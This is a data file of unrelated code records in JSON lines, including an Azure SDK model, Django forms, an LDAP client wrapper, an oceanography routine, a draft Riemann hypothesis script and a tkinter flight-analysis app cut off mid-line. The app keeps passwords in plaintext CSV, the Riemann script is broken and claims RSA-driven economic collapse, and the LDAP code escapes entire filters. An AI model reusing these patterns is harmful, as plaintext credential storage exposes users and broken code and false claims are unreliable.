'')\n lenses = list_all_lenses(prefix)\n return respond(None, {'lenses': lenses})\n\n return respond(f\"Invalid path: {event['path']}\", {})\n except Exception as e:\n print('Failed with e {}'.format(e))\n return respond(\"UnknownError\")\n\n","sub_path":"engagement_ux/engagement_edge/src/engagement_edge.py","file_name":"engagement_edge.py","file_ext":"py","file_size_in_byte":10974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"237473172","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass RegenerateKeyParameters(Model):\n \"\"\"Parameters describes the request to regenerate access keys.\n\n :param key_type: The keyType to regenerate. Must be either 'primary' or\n 'secondary'(case-insensitive). Possible values include: 'Primary',\n 'Secondary'\n :type key_type: str or ~azure.mgmt.signalr.models.KeyType\n \"\"\"\n\n _attribute_map = {\n 'key_type': {'key': 'keyType', 'type': 'str'},\n }\n\n def __init__(self, *, key_type=None, **kwargs) -> None:\n super(RegenerateKeyParameters, self).__init__(**kwargs)\n self.key_type = key_type\n","sub_path":"sdk/signalr/azure-mgmt-signalr/azure/mgmt/signalr/models/regenerate_key_parameters_py3.py","file_name":"regenerate_key_parameters_py3.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"369204118","text":"from re import A\n\nfrom django.http import request\nfrom partidas.models import Partida\nfrom presupuestos.models import Presupuesto, Actividad, Transferencia\nfrom django.forms import ModelForm\nfrom enum import Enum , IntEnum\nfrom django.db import models\nfrom django import forms\nfrom django.shortcuts import render, HttpResponse \nclass PresupuestoForm(ModelForm):\n class Meta:\n model = Presupuesto\n fields = '__all__'\n\n\nclass ActividadForm(ModelForm):\n class Meta:\n model = Actividad\n fields = '__all__'\n\n\nclass TransferenciaForm(ModelForm):\n class Meta:\n model = Transferencia\n fields = '__all__'\n\n\n\nMES_CHOICES= [\n(1,'Enero' ),\n(2,'Febrero'),\n(3,'Marzo'),\n(4,'Abril'),\n(5,'Mayo' ),\n(6,'Junio'),\n(7,'Julio'),\n(8,'Agosto'),\n(9,'Septiembre'),\n(10,'Octubre'),\n(11,'Noviembre'),\n(12,'Diciembre')\n]\nmes = MES_CHOICES \n\n\nMES_NOMBRE_CHOICES= [\n('Enero',1 ),\n('Febrero',2),\n('Marzo', 3),\n('Abril', 4),\n('Mayo',5 ),\n('Junio',6),\n('Julio',7),\n('Agosto',8),\n('Septiembre',9),\n('Octubre',10),\n('Noviembre',11),\n('Diciembre',12)\n]\n#def obtenerAnio(request):\n# anioSesion = [(request.session['anio'],str(request.session['anio']))]\n# return anioSesion\n#ANIO_CHOICES = [(2021,'2021')] \n#\n#ANIO_CHOICES = [] \n#anio=ANIO_CHOICES\n\nclass ActividadForm(ModelForm): \n mes = forms.ChoiceField(choices=MES_CHOICES, widget=forms.Select(attrs={\n 'class': 'form-control'}))\n #anio = forms.ChoiceField(choices=ANIO_CHOICES, widget=forms.Select(attrs={\n # 'class': 'form-control'}))\n \n class Meta:\n model = Actividad\n fields = ( 'programa', 'componente' , 'actividad' ,'monto', 'mes', 'descripcion', 'partida', 'anio')\n widgets = {\n 'programa': forms.NumberInput(attrs={'class': 'form-control'}),\n 'componente' : forms.NumberInput(attrs={'class': 'form-control'}),\n 'actividad': forms.NumberInput(attrs={'class': 'form-control'}),\n 'monto': forms.NumberInput(attrs={'class': 'form-control'}),\n 'descripcion': forms.TextInput(attrs={'class': 'form-control'}),\n 'partida': forms.Select(attrs={'class': 'form-control'}),\n 'anio':forms.Select(attrs={'class': 'form-control'}),\n }\n \n ","sub_path":"presupuestos/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"82139381","text":"import ldap\nimport ldap.filter\nfrom .ldapprobject import LdapprObject\nfrom uuid import UUID\n\n\nclass Connection(object):\n \"\"\"Initiates connection with handy methods\"\"\"\n def __init__(self, server, protocol='ldap', port='', verify=True,\n search_base=''):\n self.search_base = search_base\n if port == '':\n port = 389 if protocol == 'ldap' else 636\n self.ldap_url = '{}://{}:{}'.format(protocol, server, str(port))\n try:\n ldap.set_option(ldap.OPT_REFERRALS, 0)\n if not verify:\n ldap.set_option(ldap.OPT_X_TLS_REQUIRE_CERT,\n ldap.OPT_X_TLS_NEVER)\n self.conn = ldap.initialize(self.ldap_url)\n except:\n raise\n\n def type(self):\n result = self.conn.search_s('', ldap.SCOPE_BASE,\n attrlist=['objectClass', 'vendorName',\n 'supportedCapabilities'])\n rootDSE = LdapprObject(result[0], self.conn)\n if rootDSE.attrs['vendorName'] == ['Novell, Inc.']:\n return 'eDirectory'\n if '1.2.840.113556.1.4.800' in rootDSE.attrs['supportedCapabilities']:\n return 'Active Directory'\n if rootDSE.attrs['vendorName'] == ['Apache Software Foundation']:\n return 'Apache DS'\n if 'OpenLDAProotDSE' in rootDSE.attrs['objectClass']:\n return 'OpenLDAP'\n return 'Unknown'\n\n def search(self, search_filter):\n \"\"\"Get list of objects that match the search_filter\n\n :param search_filter: filter to find the objects\n :return: list of LdapperObjects (or empty list)\n \"\"\"\n search_filter = ldap.filter.escape_filter_chars(search_filter)\n result = self.conn.search_s(self.search_base, ldap.SCOPE_SUBTREE,\n search_filter)\n return [LdapprObject(item, self.conn) for item in result if item[0] != None ]\n def search_by_guid(self, guid):\n \"\"\"Get object that match the objectGuid\n\n :guid GUID like XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\n :return: list of LdapperObjects (or empty list)\n \"\"\"\n u = UUID(guid)\n search_filter = '(objectguid=%s)' % ''.join(['\\\\%s' % u.hex[i:i+2] for i in range(0, len(u.hex), 2)])\n result = self.conn.search_s(self.search_base, ldap.SCOPE_SUBTREE,\n search_filter)\n return [LdapprObject(item, self.conn) for item in result if item[0] != None ]\n\n def get(self, search_filter):\n \"\"\"Get first object found\n\n :param search_filter: filter to find the object\n :return: LdapprObject or None\n \"\"\"\n # TODO: use sizelimit=1 with proper exception handling\n search_filter = ldap.filter.escape_filter_chars(search_filter)\n result = self.conn.search_ext_s(self.search_base,\n ldap.SCOPE_SUBTREE,\n search_filter, sizelimit=0)\n return LdapprObject(result[0], self.conn) if result else None\n\n def get_by_dn(self, dn):\n \"\"\"Get LdapprObject for known dn\n\n :param dn: dn of the object we're looking for\n :return: LdapprObject\n \"\"\"\n result = self.conn.search_s(dn, ldap.SCOPE_BASE)\n return LdapprObject(result[0], self.conn)\n \n def get_dn(self, search_filter):\n \"\"\"Get list of dn's that match the filter\n\n :param search_filter: filter to find the dn's\n :return: list of dn's\n \"\"\"\n search_filter = ldap.filter.escape_filter_chars(search_filter)\n result = self.conn.search_s(self.search_base, ldap.SCOPE_SUBTREE,\n search_filter)\n return [dn for (dn, item) in result if item[0] != None]\n\n def get_values(self, dn, attr):\n \"\"\"Get list of values of given attribute for dn\n\n :param dn: dn of the object we're looking for\n :param attr: attribute name (case insensitive)\n :return: list of values\n \"\"\"\n result = self.conn.search_s(dn, ldap.SCOPE_BASE)\n result_object = LdapprObject(result[0], self.conn)\n return result_object.attrs[attr]\n\n def get_value(self, dn, attr):\n \"\"\"Get (first) attr value as string\n\n :param dn: dn of the object we're looking for\n :param attr: attribute name (case insensitive)\n :return: value as string\n \"\"\"\n result = self.get_values(dn, attr)\n return result[0]\n\n def verify_password(self, dn, password):\n try:\n test_conn = ldap.initialize(self.ldap_url)\n test_conn.simple_bind_s(dn, password)\n test_conn.unbind_s()\n except ldap.LDAPError:\n return False\n return True\n\n def close(self):\n self.conn.unbind_s()\n\n\nclass AuthConnection(Connection):\n def __init__(self, server, bind_dn, password, **kwargs):\n super(AuthConnection, self).__init__(server, **kwargs)\n try:\n self.conn.simple_bind_s(bind_dn, password)\n except ldap.LDAPError:\n raise\n\n def add(self, dn, modlist):\n \"\"\"Adds an entry to the LDAP store\n\n :param dn: dn of the new entry\n :param modlist: list of attributes made up of two-value tuples, where\n the first item of each tuple is the attribute name, and the\n second value is a list of attribute values.\n \"\"\"\n self.conn.add_s(dn, modlist)\n\n def modify(self, dn, modlist):\n self.conn.modify_s(dn, modlist)\n\n def set_value(self, dn, attr, value):\n self.conn.modify_s(dn, [(ldap.MOD_REPLACE, attr, value)])\n\n def add_value(self, dn, attr, value):\n self.conn.modify_s(dn, [(ldap.MOD_ADD, attr, value)])\n\n def delete_value(self, dn, attr, value):\n self.conn.modify_s(dn, [(ldap.MOD_DELETE, attr, value)])\n\n def delete(self, dn):\n self.conn.delete_s(dn)\n","sub_path":"ldappr/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":5965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"68689711","text":"import xarray as xr\nfrom functools import partial\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom profile import Profile\nimport gsw \nimport pickle\nfrom .lib.bottle_to_cast import bottle_to_cast\nimport os, pygamma_n\ntemplate = os.path.join(pygamma_n.__path__[0], 'util', 'refprofiles.nc')\n\nrefdata = xr.open_dataset(template)\n\ndef replaceNAN(m):\n nans = np.isnan(m[0])\n col_mean = np.nanmean(m, axis=0)\n inds = np.where(np.isnan(m))\n m[inds] = np.take(col_mean, inds[1])\n return m\n\n\ndef gamma_n(refdata,s,t,p,lon,lat):\n if isinstance(lat,float) or isinstance(lat,float) :\n lat = np.asarray([lat]*len(s))\n lon = np.asarray([lon]*len(s))\n else:\n lat = np.asarray(lat)\n lon = np.asarray(lon)\n lon[lon<0] = lon[lon<0]+360\n lats = np.asarray(refdata.coords[\"lat\"]).flatten() \n lons = np.asarray(refdata.coords[\"lon\"]).flatten() \n lati = np.floor(1 + (len(lats)-1)*(lat-lats[0])/(lats[-1]-lats[0])).astype(int)\n lati = [lati,lati-1]\n loni = ((np.floor(1+ (len(lons) - 1)*(lon-lons[0])/((lons[-1]-lons[0]))))-1).astype(int)\n loni = [loni,loni+1]\n ref_s,ref_t,ref_p,ref_gamma,ds=[[],[],[],[],[]]\n #hard coding combinations in to enforce order\n refpres = np.empty((len(lat),len(refdata.coords[\"pres\"])))\n for coords in [[lati[1],loni[0]],[lati[0],loni[0]],[lati[0],loni[1]],[lati[1],loni[1]]]:\n l1 = xr.DataArray(coords[1])\n l2 = xr.DataArray(coords[0])\n reftemp = np.asarray(refdata[\"t\"][l1,l2])\n refsal = np.asarray(refdata[\"s\"][l1,l2])\n refgamma = np.asarray(refdata[\"gamma\"][l1,l2])\n refpres[:] = refdata.coords[\"pres\"]\n sref,tref,pref,gammaref = bottle_to_cast(s,t,p,refsal,reftemp,refpres,refgamma)\n ref_s.append(sref)\n ref_t.append(tref)\n ref_p.append(pref)\n ref_gamma.append(gammaref)\n #ds.append(np.sqrt(np.square((lon-lons[coords[1]])/(loni[1]-loni[0]))+np.square((lat-lats[coords[0]])/(lati[1]-lati[0]))))\n \n \n ref_s,ref_p,ref_t,ref_gamma = replaceNAN(np.asarray(ref_s)),\\\n replaceNAN(np.asarray(ref_p)),replaceNAN(np.asarray(ref_t)),replaceNAN(np.asarray(ref_gamma))\n\n #ds = np.asarray(ds)/np.nansum(ds,axis=0)\n #gamma_n = np.nansum((ref_gamma.T * ds.T),axis=-1)\n rx = (lon-lons[loni[0]])/(lons[loni[0]+1]-lons[loni[0]])\n ry = (lat-lats[lati[0]])/(lats[lati[0]+1]-lats[lati[0]])\n\n gamma_n = (1-ry)*(ref_gamma[0] + rx*(ref_gamma[1] - ref_gamma[0])) + ry*(ref_gamma[3] + rx*(ref_gamma[2] - ref_gamma[3]))\n\n return gamma_n, [0,0,0]\n \n\ngamma_n = partial(gamma_n,refdata)\n\ndef neutralsurfaces(s,t,p,gamma_n,surfaces):\n sals=[]\n temps=[]\n pres = []\n for surf in surfaces:\n solp = np.interp(surf,np.asarray(gamma_n).flatten(),np.asarray(p).flatten())\n pres.append(solp)\n sals.append(np.interp(solp,p,s))\n temps.append(np.interp(solp,p,t))\n return sals,temps,pres\n\n \n","sub_path":"pygamma_n/gamma_n.py","file_name":"gamma_n.py","file_ext":"py","file_size_in_byte":2931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"455221959","text":"# Riemann-Hypothesis\n#Conjectures and theories about the Riemann-Zeta hypothesis \n\n#Inspirational quotes:\n#\"God made the integers, all the rest is the work of man.\"(Leopold Kronecker, Philosophies of Mathematics)\n#\"some mathematicians consider it the most important unresolved problem in pure mathematics\"(Bombieri 2000).\n\n#A proof of the Riemann-Zeta hypthosis would prove that the primes have a discernable distribution. This distrubtion would be used to #generate a descriptive list of the primes. This would bring the world economy crashing down as the vast majority of bank accounts, #credit&debit cards, messaging systems, etc. use RSA encrpytion. \n\n#(explain RSA)\n\n#For almost two centuries, the proof for this hypothesis has alluded mathematicians. \n\n#Idea: A seemingly impossible encrpytion, or in this instance a distribution, could be cracked by feeding back the encrpyted data(the #primes in this instance)\n\n#let p_0,p_1,.... be the list of primes where p_0 = 2, p_i is the i-th prime\n\np = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199]\n\n\nfor i in range(30):\n q.append(p[i])\n for j in range(i):\n q[i] = q[i]/p[i]\nprint(q)\n \n","sub_path":"roughdraft.py","file_name":"roughdraft.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"173506130","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Feb 28 01:58:51 2021\r\n\"\"\"\r\nimport tkinter as tk \r\nfrom tkinter import * \r\nfrom pandas import DataFrame\r\nimport pandas as pd\r\nfrom tkinter import ttk\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\r\nimport numpy as np\r\nimport time\r\n\r\n\r\n \r\nprogramme = tk.Tk()\r\nprogramme.title(\"Flight Analyses System\")\r\nprogramme.geometry(\"720x480\")\r\n###-----------------------------------------------------Partie1-------------------------------------------------------------------------\r\n#Fonction\r\ndef login():\r\n a = 0\r\n i = 0\r\n df=pd.read_csv(\"user_info.csv\",delimiter=(\",\"))\r\n df2=pd.read_csv(\"user_login.csv\")\r\n confirmation = 0\r\n for csv_email in df['email']:\r\n i=i+1\r\n if str(csv_email)== Entree1.get():\r\n numero = i-1\r\n password = df['password']\r\n if str(password[numero]) == Entree2.get():\r\n confirmation = 1\r\n break\r\n if confirmation == 1:\r\n affichage_resultat1 = tk.Label(o1, text=\"Bienvenue dans le système d’analyses !\")\r\n affichage_resultat1.grid(column=1, row=5)\r\n affichage_resultat1.after(3000, affichage_resultat1.destroy) \r\n print('oui')\r\n maj = {'number': i, 'email': Entree1.get(), 'date': time.strftime(\"%d/%m/%y\"), 'time': time.strftime(\"%H:%M:%S\")}\r\n print(i)\r\n for csv_email in df2['email']:\r\n if str(csv_email)== Entree1.get():\r\n email = df2[df2['email']== Entree1.get()].index\r\n df2 = df2.drop(email)\r\n else:\r\n df2 = df2\r\n df2 = df2.append(maj, ignore_index = True)\r\n df2.to_csv('user_login.csv', index = False)\r\n \r\n else:\r\n print('non')\r\n affichage_resultat2 = tk.Label(o1, text=\"Pas un utilisateur valide !\")\r\n affichage_resultat2.grid(column=1, row=5)\r\n affichage_resultat2.after(3000, affichage_resultat2.destroy) \r\n \r\n\r\ndef signup():\r\n a = 0\r\n i = 0\r\n df=pd.read_csv(\"user_info.csv\",delimiter=(\",\"))\r\n confirmation=0\r\n for csv_email in df['email'] :\r\n i+=1\r\n if str(csv_email) == Entree3.get() :\r\n numero = i-1\r\n password = df['password']\r\n #print(numero)\r\n if str(password[numero]) == Entree4.get():\r\n confirmation = 1\r\n if confirmation == 1:\r\n affichage_resultat1 = tk.Label(o1, text=\" E-mail déjà inscrit !\")\r\n affichage_resultat1.grid(column=1, row=9)\r\n affichage_resultat1.after(3000, affichage_resultat1.destroy)\r\n \r\n else:\r\n new_email= Entree3.get()\r\n new_password = Entree4.get()\r\n affichage_resultat2 = tk.Label(o1, text=\"Nouvel utilisateur enregistré !\")\r\n affichage_resultat2.grid(column=1, row=9)\r\n affichage_resultat2.after(3000, affichage_resultat2.destroy)\r\n df2 = {'number': i, 'email': new_email, 'password' : new_password}\r\n df = df.append(df2, ignore_index = True)\r\n df.to_csv('user_info.csv',index=False) \r\n print(i)\r\n\r\n \r\n#Création de la barre d'onglets\r\nOnglets = ttk.Notebook(programme)\r\nOnglets.place(relwidth=1, relheight=1)\r\n#Onglets.geometry(\"720x360\")\r\no1 = ttk.Frame(Onglets)\r\no1.pack()\r\no2 = ttk.Frame(Onglets)\r\no2.pack()\r\no3 = ttk.Frame(Onglets)\r\no3.pack()\r\nOnglets.add(o1, text=\"LOGIN\")\r\nOnglets.add(o2, text=\"PASSENGERS\")\r\nOnglets.add(o3, text=\"FLIGHT VISUALIZATION\")\r\n\r\n\r\n#Ajout des labels\r\nlabel1 = Label(o1, text='Welcome to Flight Analyses System',font=(\"courier\",20))\r\nlabel1.grid(row = 0, column= 1)\r\nlabel2 = Label(o1, text='Email:',font=(\"courier\",10),bg='blue')\r\nlabel2.grid(row = 1, column= 0)\r\nlabel3 = Label(o1, text='Password:',font=(\"courier\",10),bg='blue')\r\nlabel3.grid(row = 2, column= 0)\r\nlabel4 = Label(o1, text='Email:',font=(\"courier\",10),bg='yellow')\r\nlabel4.grid(row = 6, column= 0)\r\nlabel5 = Label(o1, text='Password:',font=(\"courier\",10),bg='yellow')\r\nlabel5.grid(row = 7, column= 0)\r\n#Ajout des entrées\r\nEntree1 = Entry(o1)\r\nEntree1.grid(row = 1, column= 1)\r\nEntree2 = Entry(o1)\r\nEntree2.grid(row = 2, column= 1)\r\nEntree3 = Entry(o1)\r\nEntree3.grid(row = 6, column= 1)\r\nEntree4 = Entry(o1)\r\nEntree4.grid(row = 7, column= 1)\r\n#Création des boutons\r\nbouton1 = Button(o1, text='LOGIN', font=(\"courier\",10),bg='blue', command=login)\r\nbouton1.grid(row = 4, column= 1)\r\nbouton2 = Button(o1, text='SIGNUP', font=(\"courier\",10),bg='yellow', command=signup)\r\nbouton2.grid(row = 8, column= 1)\r\n\r\n\r\n\r\n\r\n\r\n###---------------------------------------------------------------Partie2--------------------------------------------------------------------\r\n#Fonction\r\ndef liste():\r\n i=0\r\n df = pd.read_csv('passenger_info.csv', delimiter=(\",\"))\r\n confirmation = 0\r\n for airline in df['Airline']:\r\n i+=1\r\n if str(airline) == spinbox1.get():\r\n numero = i-1\r\n destination = df['Destination']\r\n prix = df['Price']\r\n #print(\"aero\")\r\n if str(destination[numero]) == spinbox2.get():\r\n #print('')\r\n if str(prix[numero]) == spinbox3.get():\r\n print('gg')\r\n confirmation = 1\r\n passengersid= df['PassengerID']\r\n a = str(passengersid[numero])\r\n nom = df['Lastname']\r\n b = str(nom[numero]) \r\n terminal = df['Terminal']\r\n c = str(terminal[numero])\r\n zone = df['Boarding Area']\r\n d = str(zone[numero])\r\n affichage = tableau.insert(parent='', index=0, text='', values=(a,b,c,d))\r\n \r\n \r\n \r\n \r\n\r\n#Label\r\ntitre = Label(o2,text='Passenger information',font=(\"courier\",15))\r\ntitre.grid(row = 3, column= 5)\r\nlabel = Label(o2, text=\" \", font=(\"arial italic\", 18) )\r\nlabel.grid(column=1, row=1)\r\n\r\n#Bouton\r\nliste = ttk.Button(o2, text=\"List passenger\", command=liste)\r\n\r\nliste.grid(row = 3, column= 1)\r\n\r\n \r\n#Tableau\r\ntableau = ttk.Treeview(o2, columns=('Passengerid', 'Lastname', 'Terminal','BoardingArea'))\r\ntableau.heading('Passengerid', text='Passengerid')\r\ntableau.heading('Lastname', text='Lastname')\r\ntableau.heading('Terminal', text='Terminal')\r\ntableau.heading('BoardingArea', text='Boarding Area')\r\ntableau['show'] = 'headings'\r\ntableau.grid(row = 4, column= 5)\r\n\r\n#Menu deroulant\r\ndf = pd.read_csv('passenger_info.csv', delimiter=(\",\"))\r\n\r\ncompany = list(set(df['Airline']))\r\ndestination = list(set(df['Destination']))\r\nprice= list(set(df['Price']))\r\n\r\n\r\nspinbox1 = ttk.Spinbox(o2, values=company)\r\nspinbox1.grid(column=1, row=2)\r\n\r\nspinbox2 = ttk.Spinbox(o2, values=destination )\r\nspinbox2.grid(column=2, row=2)\r\n\r\nspinbox3 = ttk.Spinbox(o2, values=price )\r\nspinbox3.grid(column=3, row=2)\r\n\r\n\r\n###-------------------------------------------Partie3-----------------------------------------------------------\r\n##__________________________________________Affichage1__________________________________________________________\r\n\r\n#Lecture fichier\r\ndd = pd.read_csv('flight_info.csv', delimiter=',')\r\n\r\n#Création tableau \r\ntv = ttk.Treeview(o3)\r\ntv['columns']=('Year','Month','DayofMonth','DayOfWeek','FlightDate','FlightNum','OriginAirportID','OriginCityName','OriginState','OriginStateName','DestAirportID','DestCityName','DestState','DestStateName','DepTime','DepDelayMinutes','ArrTime','ArrDelayMinutes','AirTime','Distance')\r\n#Entete\r\ntv.heading('#0', text='', anchor=CENTER)\r\ntv.heading('Year', text='Year', anchor=CENTER)\r\ntv.heading('Month', text='Month', anchor=CENTER)\r\ntv.heading('DayofMonth', text='DayofMonth', anchor=CENTER)\r\ntv.heading('DayOfWeek', text='DayOfWeek', anchor=CENTER)\r\ntv.heading('FlightDate', text='FlightDate', anchor=CENTER)\r\ntv.heading('FlightNum', text='FlightNum', anchor=CENTER)\r\ntv.heading('OriginAirportID', text='OriginAirportID', anchor=CENTER)\r\ntv.heading('OriginCityName', text='OriginCityName', anchor=CENTER)\r\ntv.heading('OriginState', text='OriginState', anchor=CENTER)\r\ntv.heading('OriginStateName', text='OriginStateName', anchor=CENTER)\r\ntv.heading('DestAirportID', text='DestAirportID', anchor=CENTER)\r\ntv.heading('DestCityName', text='DestCityName', anchor=CENTER)\r\ntv.heading('DestState', text='DestState', anchor=CENTER)\r\ntv.heading('DestStateName', text='DestStateName', anchor=CENTER)\r\ntv.heading('DepTime', text='DepTime', anchor=CENTER)\r\ntv.heading('DepDelayMinutes', text='DepDelayMinutes', anchor=CENTER)\r\ntv.heading('ArrTime', text='ArrTime', anchor=CENTER)\r\ntv.heading('ArrDelayMinutes', text='ArrDelayMinutes', anchor=CENTER)\r\ntv.heading('AirTime', text='AirTime', anchor=CENTER)\r\ntv.heading('Distance', text='Distance', anchor=CENTER)\r\n#Colonnes\r\ntv.column('#0', width=0, stretch=NO)\r\ntv.column('Year', anchor=CENTER, width=40)\r\ntv.column('Month', anchor=CENTER, width=55)\r\ntv.column('DayofMonth', anchor=CENTER, width=80)\r\ntv.column('DayOfWeek', anchor=CENTER, width=80)\r\ntv.column('FlightDate', anchor=CENTER, width=80)\r\ntv.column('FlightNum', anchor=CENTER, width=80)\r\ntv.column('OriginAirportID',anchor=CENTER, width=80 )\r\ntv.column('OriginCityName', anchor=CENTER, width=80)\r\ntv.column('OriginState', anchor=CENTER, width=80)\r\ntv.column('OriginStateName', anchor=CENTER, width=80)\r\ntv.column('DestAirportID',anchor=CENTER, width=80)\r\ntv.column('DestCityName', anchor=CENTER, width=80)\r\ntv.column('DestState', anchor=CENTER, width=80)\r\ntv.column('DestStateName', anchor=CENTER, width=80)\r\ntv.column('DepTime',anchor=CENTER, width=80)\r\ntv.column('DepDelayMinutes',anchor=CENTER, width=80)\r\ntv.column('ArrTime', anchor=CENTER, width=80)\r\ntv.column('ArrDelayMinutes', anchor=CENTER, width=80)\r\ntv.column('AirTime', anchor=CENTER, width=80)\r\ntv.column('Distance', anchor=CENTER, width=80)\r\n#Lignes\r\ndd1 = dd['Year']\r\ndd2 = dd['Month']\r\ndd3 = dd['DayofMonth']\r\ndd4 = dd['DayOfWeek']\r\ndd5 = dd['FlightDate']\r\ndd6 = dd['OriginAirportID']\r\ndd7 = dd['OriginCityName']\r\ndd8 = dd['OriginState']\r\ndd9 = dd['OriginStateName']\r\ndd10 = dd['DestAirportID']\r\ndd11 = dd['DestCityName']\r\ndd12 = dd['DestState']\r\ndd13 = dd['DestStateName']\r\ndd14 = dd['DepTime']\r\ndd15 = dd['DepDelayMinutes']\r\ndd16 = dd['ArrTime']\r\ndd17 = dd['ArrDelayMinutes']\r\ndd18 = dd['AirTime']\r\ndd19 = dd['Distance']\r\n#Condition\r\nlen(dd1)\r\na = 0\r\nwhile a < len(dd1):\r\n tv.insert(parent='', index=a, iid=a, text='', values=(dd1[a],dd2[a],dd3[a],dd4[a],dd5[a],dd6[a],dd7[a],dd8[a],dd9[a],dd10[a],dd11[a],dd12[a],dd13[a],dd14[a],dd15[a],dd16[a],dd17[a],dd18[a],dd19[a]))\r\n a += 1\r\ntv.place(relx=0,rely=0,relwidth=1, relheight=0.2)\r\n\r\n\r\n#Graphique1\r\n\r\ndata1= {\"Pays1\":[' Arizona',\r\n ' Texas',\r\n ' Florida',\r\n ' North California',\r\n ' California',\r\n ' Pensylvania',\r\n ' Washington',\r\n ' Nevada',\r\n ' Georgia',\r\n ' Virginia',\r\n ' Wisconsin',\r\n ' Ohio',\r\n ' Illinois',\r\n ' Missouri',\r\n ' Nebraska',\r\n ' Indiana',\r\n ' Utha',\r\n ' Massachusettes',\r\n ' Hawaii',\r\n ' New York',\r\n ' Iowa',\r\n ' Minnesota',\r\n ' Colorado',\r\n ' Oregon',\r\n 'Maryland'],\r\n\"DestStateName\":[1066,466,286,226,160,120,88,72,72,64,60,56,56,52,32,24,20,16,16,12,8,8,2.4,1.6,0.8]}\r\ndf1 = DataFrame(data1, columns=[\"Pays1\",\"DestStateName\"])\r\nfigure1 = plt.Figure(figsize=(4,4), dpi=80)\r\nax1 = figure1.add_subplot(111)\r\nbar1 = FigureCanvasTkAgg(figure1, o3)\r\nbar1.get_tk_widget().place(relx=0,rely=0.2,relwidth=0.25, relheight=0.7)\r\ndf1 = df1[[\"Pays1\",\"DestStateName\"]].groupby(\"Pays1\").sum()\r\ndf1.plot(kind='bar', legend=True, ax=ax1)\r\nax1.set_title('Le nombre de vols vers différentes destinations')\r\n\r\n#Graphique2\r\ndata2= {\"Pays2\":[' Arizona',\r\n ' California',\r\n ' Colorado',\r\n ' Florida',\r\n ' Georgia',\r\n ' Hawaii',\r\n ' Illinois',\r\n ' Indiana',\r\n ' Iowa',\r\n ' Maryland',\r\n ' Massachusetts',\r\n ' Minesota',\r\n ' Missouri',\r\n ' Nebraska',\r\n ' Nevada',\r\n ' New York',\r\n ' North Californa',\r\n ' Ohio',\r\n ' Oregon',\r\n ' Pensylvania',\r\n ' Texas',\r\n ' Utha',\r\n ' Virginia',\r\n ' Washington',\r\n 'Wisconsin'],\r\n\"DepDelayMinutes\":[10825,2018,183,1697,825,275,871,321,91,45,27,137,229,183,642,183,1284,871,0,1284,4495,458,733,917,183]}\r\ndf2 = DataFrame(data2, columns=[\"Pays2\",\"DepDelayMinutes\"])\r\nfigure2 = plt.Figure(figsize=(4,4), dpi=80)\r\nax2 = figure2.add_subplot(111)\r\nbar2 = FigureCanvasTkAgg(figure2, o3)\r\nbar2.get_tk_widget().place(relx=0.25,rely=0.2,relwidth=0.25, relheight=0.7)\r\ndf2 = df2[[\"Pays2\",\"DepDelayMinutes\"]].groupby(\"Pays2\").sum()\r\ndf2.plot(kind='bar', legend=True, ax=ax2,color='r')\r\nax2.set_title('Comparaison des délais avec la destination 1')\r\nrects2 = ax2.patches\r\npourcentage2=['38.57%','7.31%','0.31%','6.17%','2.73%','0.86%','2.76%','1.02%','0.13%','0.08%','0.07%','0.23%','0.78%','0.64%','2.24%','0.62%','4.41%','2.83%','0.0%','4.58%','15.93%','1.45%','2.51%','3.19%','0.59%']\r\nfor x2, y2 in zip(rects2, pourcentage2):\r\n height = x2.get_height()\r\n ax2.text(x2.get_x() + x2.get_width() / 2, height + 5, y2 ,ha='center', va='bottom',fontsize=7, color='blue', fontweight='bold')\r\n\r\n\r\n#Graphique3\r\ndata3= {\"Pays3\":[' Arizona',\r\n ' California',\r\n ' Colorado',\r\n ' Florida',\r\n ' Georgia',\r\n ' Hawaii',\r\n ' Illinois',\r\n ' Indiana',\r\n ' Iowa',\r\n ' Maryland',\r\n ' Massachusetts',\r\n ' Minesota',\r\n ' Missouri',\r\n ' Nebraska',\r\n ' Nevada',\r\n ' New York',\r\n ' North Californa',\r\n ' Ohio',\r\n ' Oregon',\r\n ' Pensylvania',\r\n ' Texas',\r\n ' Utha',\r\n ' Virginia',\r\n ' Washington',\r\n 'Wisconsin'],\r\n\"ArrDelayMinutes\":[12000,3052,105,2000,842,421,631,210,52,31,0,105,421,105,1578,210,2000,1157,0,2000,6842,947,1052,1263,210]}\r\ndf3 = DataFrame(data3, columns=[\"Pays3\",\"ArrDelayMinutes\"])\r\nfigure3 = plt.Figure(figsize=(4,4), dpi=80)\r\nax3 = figure3.add_subplot(111)\r\nbar3 = FigureCanvasTkAgg(figure3, o3)\r\nbar3.get_tk_widget().place(relx=0.5,rely=0.2,relwidth=0.25, relheight=0.7)\r\ndf3 = df3[[\"Pays3\",\"ArrDelayMinutes\"]].groupby(\"Pays3\").sum()\r\ndf3.plot(kind='bar', legend=True, ax=ax3,color='r')\r\nax3.set_title('Comparaison des délais avec la destination 2')\r\nrects3 = 